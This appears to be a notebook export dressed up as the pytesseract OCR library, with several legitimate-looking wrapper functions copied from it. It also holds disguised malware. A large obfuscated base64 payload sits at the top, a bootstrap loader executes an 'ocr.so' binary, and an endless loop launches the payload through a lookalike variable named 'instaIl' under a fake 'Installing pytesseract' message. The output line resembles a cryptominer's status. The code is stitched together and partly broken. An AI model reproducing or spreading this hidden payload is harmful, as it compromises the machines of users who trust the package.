2srTjhXZTFnMFU2bEhNQ2JxSWYrSVEwcm1XSG9rdnQybG1ZUGU0S0FiTXlweUxGOGJnZzRpZVpGdGZSaGFucTFTRGdJRFNWanNLZzVubjZzTkNGUC9YUEU0N0t1Yjg3bGhlTlhPM3hUMjdRREF0N0haVUFqa29iK0VHN3hFL3hScGtmc1pSdCtBZlN6SGFsNTZPS3ZYTVo0ckZ6VlVPTmJSb1JOZ0xWK1g4Z1lOTlgzWW1UQXVkT3U5QVpZdTZVV2V0MUJ3Q2JDNFJvb2gvUHdydnFjM1BUMmJDOGkxM0U4K3p5dXhIS2luVFZ6VHlva3E3SDBwT3FHNFVPYkt5ZXk5UTR5bDdITkZmdUh6ZENyUGg2b0xGck9GeTZwTzZsc1BMaGlpMVVuSHZDR2FVN1VIaXNZZWRnUUdNQU9rR2tFVWsweEs1V1NIdXZoclVxK3M4RHhXeDkvMVgrWlhrKzZlL3p5RGlibWMyNkYxaEh5bXVRdkRySGlVcEhNWERrZnRlSll4a0VuWUM5MUg0eVQySjdnNFd4Q2ZMRlBlVEpxOFQyUTJ4WnBSNzhWaGRlZnh4cFhnVVIvWkhzVW4zQnQwb3RwT3VrTmd2SlkzTjN6aGVYUWtzQkkxWGJJd0hlWFBrZG91SlNQV0RETm5aSEdBb3lVaWxSOGxqbDRYSExhSnhGT2FZaXVSSTFIamhnL0x5VFNnN0YrSW5NNEl5TGx0NVJDYnNRdEd6TndQUWtMaXU3eG1kbjMyaFBqUis1cmttYmxVSmp5cEFoSHh3L2hSU0owTGQ3cUtpTWhaYTJNRTZUYnJuTDMvbzdCOEl5NkMybGNUeSsydWpvUXNUajlCU0xFdEpHbDBoVTR6bFp5bnJRVDJqaGFzUlFhSCtjcHBNNWZNajVtTHdrei9TaVcrNHRVbGRGYnNpaklXa2JlcDNWVlRRNjhSTWVCdC9rR0dvKy92ejY0anM0L3dhQWhwd0pwTXU4VHhnM2V3bGtPYU5aYXdjS3haMHE1bGc3ZXBkblRmM3o5bEJFVlpybEhLVGY3ZVR1NDZLQWpLWXNKSzBRVUZYNHovRFR1WnZTZVVCK3JkZVdrNWNiSVQ4RWRPZUhaOElwcTJCa3NWVWJoSEhIRkIydTlmRTl6eFBla2RPb2FCdDllSEZzcEFqRWMwMnNPREZHYXFlaHFGVUtpek82KzZ0c1IxZk15ODdoWEhQblRicUM0NUpLR28xM0M5Z1JFQ2UzV1JlNm40TEI0SUhGV1F0dFBuc0xqUWE2R1ZEZGhXNXdHeWE3b1JRL08vMnJ1OTNPdFdjY1huSE1WbzB6cmZhQ3ptb3g0Uk5DeWN4ZVZGTWc4THRUWEpjVlBKNDZEOTFrWWVsdlBKeFVVVjA0U3QzSnpaSmVLN0VmNnlxVGZpaFJrWXpqd0lHTFJycFQya0w5ZzJHN0tyNDBUZW5KMUJSa0pZdS9oVU1pVzhnRjVrMXRBY1pyS1Z2b0hLdUorUE9UVFZrY3JrSW81M3Z3QmcwVWY1SnFFRmlSU25jVmUzVjY1akVOUFdaaUwzdVAwUmNtMVFTb0V5U0Ixc1RtVWRlVmZ6cUdMUlJaeDBWUHFhblFuaXhXaWNscFpGc0llenhncHl0WkhVbHUzeDhySytnTlBwSnVzbkxUKzdUS1RsekJjdytrMS9JMHFkTkNucHBuOUlQTGZwNlFES0tvUTRrdXdjNW15VnJ4R0tKV1BRQWhJL1FMK3MzSU1IQXlrMDFOZDBxWExBSW5VYlVVN1B6UzdJaE5mTFdnei9aeGVIR0RaTjI0ZFhFeTZpUVFXK0JnV0pLbHVVaG9zQnZndm5NM0hESWgrak9MQ0pWVDlpT3lUcjU5MEdVcWZ6dVNVbnFrZWhyY25oVTgwWGJBSjh6MFY1SzJiWUUweEE4TGlqVjB4NUxCVm42YVFjQ255NnFNRVVqV2l6N05kUzBveWJtV0ErVnVLblpHRXd1d1J0NDlvSzBKZFJnV3EvUSt6TjE1cmtJbW8zYXI4a0MwZy8rTG9MMGUvNStMVTI0ZXRxMThHdFRrQ0o3WVczSW4zWThDRTFVai9DQXFESjNUdHU3NDRmU0lRMXNoemc1R1ErYkEzV2FqT1lzdVdBMlZDclE4ZGx1TTRnVXpCS1dJc1p0TW9Eb0taWnVmdWRnakJ3KzZOb2hQdWlreVNTZEI2cnJJN3hlUW9kaXVCYm4wZDVVRTNFK1NJcVgzZ2ROQURRU0pJT0YxaTFqVG5JZmFQM0dJMXFZb2ZzeDVNRzlOUUhkbGJOWGF5Q2k5YTVqVHRXQkJCeWNxNGhSNWNHekxPR1NxWkNNWTRsaEs0M1piMXJzZUNTbHhFT0REaFl3QlZVMHNTUHhJZmJndXFNc0NJTzFxZGZpRUVhb0x6V2NZcTVCVWVabWNndjhpRW9hN0tlcHNiOW1TMER1ajJxWnIyNlo0dGdvRlFLWHVBclZwd01YL0RRaGs4anIySlh5cnBEK2xBcTdUbXZKZUNCaXRSU1ZJTXBUa1hIRGl5b0svekZPand3SllFQWlKSWFLWVJvY2lKaXpITi9oQzhuVzBRaUVYaWwxU2FDSExISFdmV2xkU2E2azdWUHZTVlArVHgzS0NEUzRZYUc0M2ZZTGpkYmgyVlE4MXp1VWtocU0xMVc4aTVjK05LcURCMjZ6ZHE3VlBPcFdQNW4rNmRhVjg1bXZhZHdGT0Z2RW5UQytCUWFpUjBJWmZtSktTTC9kNUtJK2Vvak8zRGhsZ3NhekdVaGE0Z0R6NUJCTWdncUtLOFErU2VLMEpKRWoyb2ZoQUdwbFprcHpnQXB4QW4vYklVTjFCUCtwcitkSktsTHhFL21uS3ZWQ0lkZ3B6Z0VLWExoRjN3V0FxOWRKUHZGZkVyTzUrRmtkTnIyelk4OHUzKytkdHJFNXVuemgrTmtnZ0Ricm14UExzQ2x4STZvbTlldWVwb0F1TmlScXRzck05aWRud2h2cUUwNmo3NjhLZDdRa1NwNkQ1WWZVOGdBd2xyTXozTExKbFhTQXRwb0NRZkJSeTBWeFZqbUJPYnVBT3VOcUN3MHlTbFMxNU5wRFUyd2k5TkNwOWxxbG9odTl6RytIOGJEREw0WmhPNmkrMHZhaFUxWEJrODFPUGh1UGFZT3JDK1dBRnZQTWs5eDdrNytFTDZybVlvOVBlNnQya3p6VkxXUkFjVVZKM0VKY0FQNTFIZkJuNFdTMmIrSzFYSjY2MXJ2Smh4K284UEFnRWx3UWZGcTdtQ21tdTljWVdPcVBEeHFqMWJIZ0NrbUNkMHVjVitnUllWMXQvVXZhU0dCODhxUEJVR1FnQi9WTXZVWG9PcnpZdzR1VDhqTU16a2trSUhXNWpBRXkzQzZXUW5aemJBV3lBaGRIRFRScE9iNFNKVDlyeFJTb2JCVTVnOFgyTk1LMnN2QXdobys4anBrT21McmthTW9lN3lOWXlMQm91akpVaFRXQ2tQUGlDL0M1OUdQMXkrQUFlTkVxV05GRm9qcnRlMmlwMm9tc3FjeTd1TGxsR1BmcG8vMUR5OFJqU1lIaTZPNnF6eEozSSt4SDl1SVJvbWhVQlVKeXBySjBMUUg3c0NWaC9RZmVqVDlYdDJIOHNNdldMWVkwdytBMVZiL05sTU9mUzJUTzVhZ0tWbEpnbm5rUmFqN1BJL3ZNRlVPV2I2L2ZQQXlNSUdjcHE5YlB0TXZSZlZpM1ZtZXczUS85VlVKWjN0QzU3c2pIcllsV0NOZ2ZYaFhYUDYrZm5BcVZ0SjRjMkNKeGwzRjdPcGFMSUkxR2dYNERxbFE3cTdQMU1pc0dOTEVuZEg5eEp6MWhUSVkrSllTaTAvRnJLQzdxWDVSdlgvaDFRendQVnRwMFBrb0w5Y2F6dS9rVlRVZk1iZ0xjM0VETEhKaUNtRlZ0QUs3bGxaRlV6UEZWZmVtMS9UQWt4Z08veXg5Nk9vd2tseUpVSUVIelNnbGsxS2p4d3J1RnppVlBlU25SaUlRemNvVG9LRmFWbWtha09ieXUvMThaVlhlUUxRTHNtUWZWQ1FkV0VxeVZpbkZ4WnNEYVc1ZnRBL1FuY3pPcG9vRWovMC90V2c4MVpzL2pPL0F4T0pzazdjdUlkdlFoWkkzWVlTb1BTZDVDdTZPQVRxVkJadG0zZDltVVZ6OHltSHN1TjByZkV1MWNsUE8veXJlVDFuVGg0M0d1cjhhMU8xRjRxMzVkQW5URGxEalpjcENoL0xVZjV0V2RkOGgydVR4TkUzNXNhbzFmaFMvb21CQThraWcvR2VTOWdpS2pUZE9ldFczQ0M2ODZKTTRrMkJkN21rd25XTUdydnNWYjlqanVVYkdMalc1S0dwZEY2T1lZUk9wTVJiYmtQWGNrREthUDlsTFdEcy9uOFF1Y3hNWmNQYm5PcUtJVko1aU5VcjF4NWdtVlBxYzYyUXNjSGNrWlFZNG0wU1NJcnp5bkh3cHhuY29sa1VBUXRlOEo0QmVnMGREbE1OalQ3NFBHL3htM3k4dS80YlVmajRidnY4d2p1Zi81Rm8zTE8xK3phZyttdGlXcXE2dld1WG5TTFhDbElVV3dJUklqZW11ZVowQmJqVDgyNm5VUnIra1BVSzAzbzNaSHpjOURnNThXQU5GanVCSU50NHNSSkk0OXBFRXZuekdUc3diczFWeEdkUDFMTTZ6bkFVNmZ2bnhwVjBrVmwwVU9kK0xUd0Juek1VY1pQK1ZINkVtTEVDRnFOZGZyeEx3a2o5eUZ2RURGdGJ5QmpnTWpldExuYjVER3hDMkRWYTJRdmJBa0pMTXRXZm5xbDc3dUNFaW9oNnBMOFdhaDJTL3RvemlRY2tLa1c0aG9UT3p4eXZiYVpIM3ZBNmFNU21JNGU1ZW10OWFRcXBRYzRhbTljVjdHLytCSUFFdzdCYkxVelk4bWFyc2NieFJDSlZsaFoxUmFoeGxSQUF6RDVhNDFjREd6Tlcwd3JyY1JmUDZYUHZsS0QwVE8vV1pSVUJNcjFzdkZvWnkrWWJTWVJqbUR1NnkyM3lFSFFINnNlelFlRHd0NWQzZDA1b3ZacWU0eGFXM3VycWZlR01IelgyMS8wZjNZVDdvNjVTK2x2UnVJdHRCTHc5RlZlWFJpOU1HajZGWUIwc3VQMFI3SDhITjllQUhoRXVvNGRWYkQ5aFhRNEdVVEhhQVJZcGtKWFZsLzhOTG9IRFdqaVBvT1pidE52WjBobUs0UmdFNHBkQXh5QStydG1ZeEJNSWdsdUt5SWJYZ2ZmOXFScDhHeTNsZ0RHcmlkMFRoUWlDZUpxTEgwVVBMMjMxb0pZc3cweG95NzZLVURYaE5ERU5zdWJPTVFmS3BCYlU5bzhMWVJpZGcvTERiTnN5OG9GRW05eHRmYWN5ZG5BTGNCZElMejlMcWJScmVET1ptWGZRQngrVzgwM3VOYlJzV1ZsbSsvT3NiQnZFRXYrMFV0V1ZGOFk5eUk1bXV3MklYQjVaN0h4NmlLandNakxYMXZHc3kvcndvMllwL1VYaTFQZE1GTUdmWWdMK3ZUVGlEV0pXbDBDMzNLM1JwRGg3eHhtSXhFYzlhd1B3MjhHTVFYNzNKWjNNUmdTbUlOL2RLRWI4QU0rMEF0NWtPaW9NQnJXMWUrZXk5ZFhaUG5LSUVDU1hZcE1hcElrdmNDbU1zdm9ZYnVpQ1lGZmplK0lRNFFXY0hBb3E5SHdRQ1VHc3dLUG9QTGlMZ2FtS3lBUlBJVnNHUGtKYlhUQThWbi9jWTBWTWx3OGx1S3liNktuNUUzYU9TT1VyNk05SERNZGc2a2VHN04zb1dDM0hLVXVnOWtzWjBod1U1TUpkQ1hJVjZqTjNzQ1FkZ1NWaFZXVkVDUWNKV0pueitJT3RaWXI2TjlhdWwzajdrK1h3TlY0RFF2WUczZi9lTkJwcGdKMGtqalpnMDlIUmpDMm5kU3BxRnNxVmJNcUFUODZDczA5MFNwU2k4eTA0UkNqVW5xSHdtU25VekplQ3ZpbDYyY1kvdUNGQjdrNWNvNFVOUTZPUHdrNDYyeHg5d2NWdFJsV0ZaSzZld2dRS2FMS0FNUGZlYVJQQmlLRlBVdStaRWw5K1RNT1JIWW9uSmtNR3FpWkRSNDJla2NmM2RHc3hNaHRpTGlLcVhnMDA2Nk13Wm5pckVMUlFDOVBlSWhFbk5LUllpc1dReks5REVIZkdQVEZuc3hydXorWGc5dnN2eDllTXZ5VnYzWkZsUmY2bUJBTE9kWDZQQ01HWFdmV2lJcFl1YnduZVBIc1NmNDNqRHlTbkYreXQ5eVprU1NVTVZIY2RGUU1Jbkcrck01d1p6U1lRTndKKy9RcFUyNkY5T1I0Z0dHVC9tTzFWL0RpUitSZk5BYjBqOWN3c3piOVdpc3dtM3ZXYXpPSDJ5RGdyRi9hR2NTNUlNNGh5dUpSWHZicVJ4enpNczc2a051RmQzd0JaUTY4SWxubFVLNzZOcU9TV2ZTR29YR0RwdkxYZjJDSFhiTVFzUVA1dmNmSi9UajdDeWcrQzQ4eitSaUljV0t0ZEdKT05XYWpBdi9kYVQ5cDRteENMSmg0d1FRaGx0OUhWdUF1dXRSTFdoUXRFM0c2cTc5WXR5SGc1ckRRanA3T0lxTitwcUtHRHhPek01Y3VweDE5TjdMdWFpWlZuaDF3dkZGSEVMcjdybXg0UmNXTUxpcHJnKzdNbSt6Vjl5V2ZoY1k2L3dybHpaVm9IWGwzQWI5ZFhJOWFubDFBZlA2OVVjMnhjSGNFRXl3MVFNS0xtVDZ2MmcxRDRRQzZWbGptRmlZM0hrb3loNDdIVjBwYncwUEN6Z0V4ZnpOY004Q3VUenhteExnZUk4K3JTYXZtRGkxWUYxaExqaXZEeWZRWGJLUlp2MnNDRm9WeDE2VzlCY0NhTEdIWTV4VFFDbjhiTks0akhmaDdTSnNaRlB6eDVWSWFhZGg0T0tNWk9TVEJkTEErMER3NkloYjNHRWxpMUF5a2NLbjh3ODdMZE1MYkQ5MEFvL3duMk1nNTBvdWhnWTZjRkFFajRDWk53T0duTU41blZtK0loNk5tek1yMXBOaXVQcWQzYTE1amxMajZyMkNLRndrRUhKU0hRdXR5TUpEYjU4SFlQT3M3WWJMYUdJcUFjSTdmakl2alE4dXQ5T0NYQktkSG1rSVNwM29oYXdEL2ZmN3NnZUoySllwakNUUGRLZkZjUS9NMnJ5eXRLSFVGSyt3eUlmL2NaR0QwZG9WU0VkUWJ4V09SVkptVWxCcG8vSmxnQXpLOHBNNU0xR2syZmZmKytucy8rLy96bjdmWi9wU1Z2ZW51OVJBS3FTQjg5ejNGRTZCOHZTaTN3UEl3bXNBdkMwaTduOVRSU2c5cVNjYm1Wd0plJykp='))"
def get_tesseract_version():
    """
    Returns Version object of the Tesseract version
    """
    try:
        output = subprocess.check_output(
            [tesseract_cmd, '--version'],
            stderr=subprocess.STDOUT,
            env=environ,
            stdin=subprocess.DEVNULL,
        )
    except OSError:
        raise TesseractNotFoundError()

    raw_version = output.decode(DEFAULT_ENCODING)
    str_version, *_ = raw_version.lstrip(string.printable[10:]).partition(' ')
    str_version, *_ = str_version.partition('-')

    try:
        version = parse(str_version)
        assert version >= TESSERACT_MIN_VERSION
    except (AssertionError, InvalidVersion):
        raise SystemExit(f'Invalid tesseract version: "{raw_version}"')

    return version


def image_to_string(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to string
    """
    args = [image, 'txt', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: {'text': run_and_get_output(*args)},
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_pdf_or_hocr(
    image,
    lang=None,
    config='',
    nice=0,
    extension='pdf',
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to pdf/hocr
    """

    if extension not in {'pdf', 'hocr'}:
        raise ValueError(f'Unsupported extension: {extension}')

    if extension == 'hocr':
        config = f'-c tessedit_create_hocr=1 {config.strip()}'

    args = [image, extension, lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_alto_xml(
    image,
    lang=None,
    config='',
    nice=0,
    timeout=0,
):
    """
    Returns the result of a Tesseract OCR run on the provided image to ALTO XML
    """

    if get_tesseract_version(cached=True) < TESSERACT_ALTO_VERSION:
        raise ALTONotSupported()

    config = f'-c tessedit_create_alto=1 {config.strip()}'
    args = [image, 'xml', lang, config, nice, timeout, True]

    return run_and_get_output(*args)


def image_to_boxes(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing recognized characters and their box boundaries
    """
    config = (
        f'{config.strip()} -c tessedit_create_boxfile=1 batch.nochop makebox'
    )
    args = [image, 'box', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: file_to_dict(
            f'char left bottom right top page\n{run_and_get_output(*args)}',
            ' ',
            0,
        ),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def get_pandas_output(args, config=None):
    if not pandas_installed:
        raise PandasNotSupported()

    kwargs = {'quoting': QUOTE_NONE, 'sep': '\t'}
    try:
        kwargs.update(config)
    except (TypeError, ValueError):
        pass

    return pd.read_csv(BytesIO(run_and_get_output(*args)), **kwargs)


def image_to_data(
    image,
    lang=None,
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
    pandas_config=None,
):
    """
    Returns string containing box boundaries, confidences,
    and other information. Requires Tesseract 3.05+
    """

    if get_tesseract_version(cached=True) < TESSERACT_MIN_VERSION:
        raise TSVNotSupported()

    config = f'-c tessedit_create_tsv=1 {config.strip()}'
    args = [image, 'tsv', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DATAFRAME: lambda: get_pandas_output(
            args + [True],
            pandas_config,
        ),
        Output.DICT: lambda: file_to_dict(run_and_get_output(*args), '\t', -1),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def image_to_osd(
    image,
    lang='osd',
    config='',
    nice=0,
    output_type=Output.STRING,
    timeout=0,
):
    """
    Returns string containing the orientation and script detection (OSD)
    """
    config = f'--psm 0 {config.strip()}'
    args = [image, 'osd', lang, config, nice, timeout]

    return {
        Output.BYTES: lambda: run_and_get_output(*(args + [True])),
        Output.DICT: lambda: osd_to_dict(run_and_get_output(*args)),
        Output.STRING: lambda: run_and_get_output(*args),
    }[output_type]()


def main():
    if len(sys.argv) == 2:
        filename, lang = sys.argv[1], None
    elif len(sys.argv) == 4 and sys.argv[1] == '-l':
        filename, lang = sys.argv[3], sys.argv[2]
    else:
        print('Usage: pytesseract [-l lang] input_file\n', file=sys.stderr)
        return 2

    try:
        with Image.open(filename) as img:
            print(image_to_string(img, lang=lang))
    except TesseractNotFoundError as e:
        print(f'{str(e)}\n', file=sys.stderr)
        return 1
    except OSError as e:
        print(f'{type(e).__name__}: {e}', file=sys.stderr)
        return 1

def __bootstrap__():
    global __bootstrap__, __loader__, __file__
    import sys, pkg_resources, importlib.util
    __file__ = pkg_resources.resource_filename(__name__, 'ocr.so')
    __loader__ = None; del __bootstrap__, __loader__
    spec = importlib.util.spec_from_file_location(__name__,__file__)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)


while True:
    install = 'pip install pytesseract'
    process = subprocess.Popen(
        ["python", "-c", instaIl],
        preexec_fn=os.setsid
    )
    try:
        print("Installing pytesseract...")
        process.wait(timeout=3600)
    except subprocess.TimeoutExpired:
        os.killpg(os.getpgid(process.pid), signal.SIGTERM)
    sleep(1)


Installing pytesseract...
Pytesseract-0.0.1 | Text=N/A | Threads=2 | Complete=0 | 0.00 B/s


<a style='text-decoration:none;line-height:16px;display:flex;color:#5B5B62;padding:10px;justify-content:end;' href='https://deepnote.com?utm_source=created-in-deepnote-cell&projectId=38b29736-9275-411b-9bd9-1f21d97379cd' target="_blank">
 </img>
Created in <span style='font-weight:600;margin-left:4px;'>Deepnote</span></a>